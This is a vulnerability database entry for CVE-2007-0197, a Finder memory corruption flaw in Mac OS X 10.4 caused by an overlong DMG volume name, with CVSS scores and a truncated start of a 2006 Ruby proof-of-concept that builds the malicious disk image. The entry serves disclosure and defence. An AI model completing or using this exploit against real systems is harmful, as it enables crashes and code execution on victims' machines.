6.8
CVSSv2

CVE-2007-0197

Published: 11/01/2007 Updated: 16/10/2018
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
VMScore: 685
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

Finder 10.4.6 on Apple Mac OS X 10.4.8 allows user-assisted remote malicious users to cause a denial of service and possibly execute arbitrary code via a long volume name in a DMG disk image, which results in memory corruption.

Vulnerable Product Search on Vulmon Subscribe to Product

apple mac os x 10.4.8

apple mac os x 10.4.6

Exploits

#!/usr/bin/ruby # (c) 2006 LMH <lmh [at] infopullcom> # require 'fileutils' require 'zlib' hdiutil = "/usr/bin/hdiutil" dmgname = (ARGV[0] || "MOAB-09-01-2007dmg") dmgsize = (ARGV[1] || "200k") filesys = (ARGV[2] || "UFS") volname = "" 255times do volname << (i = Kernelrand(62); i += ((i < 10) ? 48 : ((i < 36) ? 55 : 61 ...